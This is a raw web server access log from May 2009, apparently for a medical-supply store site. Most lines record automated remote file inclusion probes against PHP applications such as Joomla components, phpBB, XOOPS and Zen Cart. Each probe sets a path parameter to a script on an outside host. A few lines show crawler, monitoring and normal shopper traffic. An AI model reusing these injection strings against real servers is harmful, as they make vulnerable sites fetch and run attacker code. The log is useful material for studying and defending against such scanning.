190.144.44.36 - - [15/May/2009:00:00:22 -0400] "GET /logs/access_log.Q108100600%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [15/May/2009:00:00:29 -0400] "GET /logs/access_log.Q108090100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.125.64.49 - - [15/May/2009:00:00:55 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.51 - - [15/May/2009:00:01:01 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.118.90.253 - - [15/May/2009:00:02:06 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
220.181.7.97 - - [15/May/2009:00:02:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.94.30.156 - - [15/May/2009:00:02:37 -0400] "GET /logs/access_log.Q108110900/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
69.94.30.156 - - [15/May/2009:00:02:37 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
69.94.30.156 - - [15/May/2009:00:02:37 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
212.227.63.136 - - [15/May/2009:00:02:54 -0400] "GET /logs/access_log.Q109050900/mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:03:14 -0400] "GET /logs/access_log.Q109032000%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:03:14 -0400] "GET /logs/access_log.Q108081900%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.90.72.88 - - [15/May/2009:00:03:28 -0400] "GET /logs/index2.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
69.90.72.88 - - [15/May/2009:00:03:28 -0400] "GET /index2.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
123.125.64.38 - - [15/May/2009:00:03:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [15/May/2009:00:04:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.43.5.67 - - [15/May/2009:00:04:47 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:04:47 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:04:47 -0400] "GET /logs/access_log.Q108060500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.94.30.156 - - [15/May/2009:00:04:56 -0400] "GET /logs/access_log.Q108090100/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
67.43.5.67 - - [15/May/2009:00:05:10 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:05:10 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:05:10 -0400] "GET /logs/access_log.Q108100900%20%20///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.118.90.253 - - [15/May/2009:00:09:31 -0400] "GET /logs/error_log.Q108053100//modules/vwar/admin/admin.php?vwar_root=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.823"
64.118.90.253 - - [15/May/2009:00:09:41 -0400] "GET /logs/access_log.Q108051700//modules/vwar/admin/admin.php?vwar_root=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
122.153.212.195 - - [15/May/2009:00:09:42 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:09:42 -0400] "GET /logs/access_log.Q108060500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:09:42 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:09:44 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:09:44 -0400] "GET /logs/access_log.Q108060500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:09:44 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [15/May/2009:00:09:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.30.156 - - [15/May/2009:00:09:49 -0400] "GET /logs/access_log.Q109020500//modules/xfsection/modify.php?dir_module=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.94.30.156 - - [15/May/2009:00:09:49 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
69.94.30.156 - - [15/May/2009:00:09:49 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
64.118.90.253 - - [15/May/2009:00:09:50 -0400] "GET /logs/access_log.Q108082500//modules/vwar/admin/admin.php?vwar_root=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
193.221.119.126 - - [15/May/2009:00:10:08 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
193.221.119.126 - - [15/May/2009:00:10:08 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
193.221.119.126 - - [15/May/2009:00:10:08 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
64.118.90.253 - - [15/May/2009:00:10:11 -0400] "GET /logs/error_log.Q108050700//modules/vwar/admin/admin.php?vwar_root=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.823"
64.118.90.253 - - [15/May/2009:00:10:16 -0400] "GET /logs/access_log.Q108053100//modules/vwar/admin/admin.php?vwar_root=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
72.52.230.168 - - [15/May/2009:00:10:25 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:10:25 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:10:25 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:10:28 -0400] "GET /logs/access_log.Q108100900%20%20///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:10:28 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:10:29 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:10:50 -0400] "GET /logs/access_log.Q108100900%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:10:50 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:10:50 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [15/May/2009:00:11:22 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
83.143.81.26 - - [15/May/2009:00:11:24 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 1423 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.52.230.168 - - [15/May/2009:00:11:51 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:11:51 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:11:51 -0400] "GET /logs/access_log.Q108100900%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.246.20.221 - - [15/May/2009:00:12:04 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:05 -0400] "GET /?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:05 -0400] "GET /logs/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 1418 "-" "libwww-perl/5.79"
72.52.230.168 - - [15/May/2009:00:12:07 -0400] "GET /logs/access_log.Q108090400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
193.221.119.126 - - [15/May/2009:00:12:25 -0400] "GET /logs/access_log.Q108090400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
201.232.54.48 - - [15/May/2009:00:12:38 -0400] "GET /?rootSys=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
201.232.54.48 - - [15/May/2009:00:12:38 -0400] "GET /logs/access_log.Q108100600/?rootSys=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.232.54.48 - - [15/May/2009:00:12:38 -0400] "GET /logs/?rootSys=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 200 1418 "-" "Mozilla/5.0"
218.246.20.221 - - [15/May/2009:00:12:42 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:43 -0400] "GET /?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:47 -0400] "GET /logs/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 1418 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:51 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:52 -0400] "GET /?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
218.246.20.221 - - [15/May/2009:00:12:52 -0400] "GET /logs/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 1418 "-" "libwww-perl/5.79"
218.249.36.194 - - [15/May/2009:00:13:00 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:13:00 -0400] "GET /logs/access_log.Q108060500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:13:01 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.143.81.26 - - [15/May/2009:00:13:03 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:13:05 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
67.43.5.67 - - [15/May/2009:00:13:09 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:13:09 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:13:09 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:13:09 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.144.44.36 - - [15/May/2009:00:13:21 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [15/May/2009:00:13:21 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.144.44.36 - - [15/May/2009:00:13:21 -0400] "GET /logs/access_log.Q109050700//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:14:26 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:14:26 -0400] "GET /logs/access_log.Q109013100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [15/May/2009:00:14:31 -0400] "GET /logs/access_log.Q109050700%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
88.84.130.178 - - [15/May/2009:00:14:32 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.130.178 - - [15/May/2009:00:14:32 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
217.18.76.16 - - [15/May/2009:00:14:46 -0400] "GET /logs/access_log.Q108110900/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/May/2009:00:14:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.18.76.16 - - [15/May/2009:00:14:46 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:14:47 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
66.225.211.159 - - [15/May/2009:00:15:12 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.225.211.159 - - [15/May/2009:00:15:12 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.225.211.159 - - [15/May/2009:00:15:12 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.225.211.159 - - [15/May/2009:00:15:12 -0400] "GET /logs/access_log.Q108100800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:15:13 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [15/May/2009:00:15:13 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
66.225.211.159 - - [15/May/2009:00:15:15 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.225.211.159 - - [15/May/2009:00:15:15 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.225.211.159 - - [15/May/2009:00:15:15 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.225.211.159 - - [15/May/2009:00:15:15 -0400] "GET /logs/access_log.Q108100800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:15:26 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:15:26 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.246.20.221 - - [15/May/2009:00:15:26 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
122.153.212.195 - - [15/May/2009:00:15:30 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:15:30 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.143.81.26 - - [15/May/2009:00:16:15 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:16:19 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
98.210.214.2 - - [15/May/2009:00:16:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:16:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
66.225.211.159 - - [15/May/2009:00:16:38 -0400] "GET /logs/access_log.Q108100800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.210.214.2 - - [15/May/2009:00:16:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:16:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:17:11 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:17:13 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:17:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:17:14 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:17:14 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
98.210.214.2 - - [15/May/2009:00:17:14 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; eSobiSubscriber 2.0.4.16)"
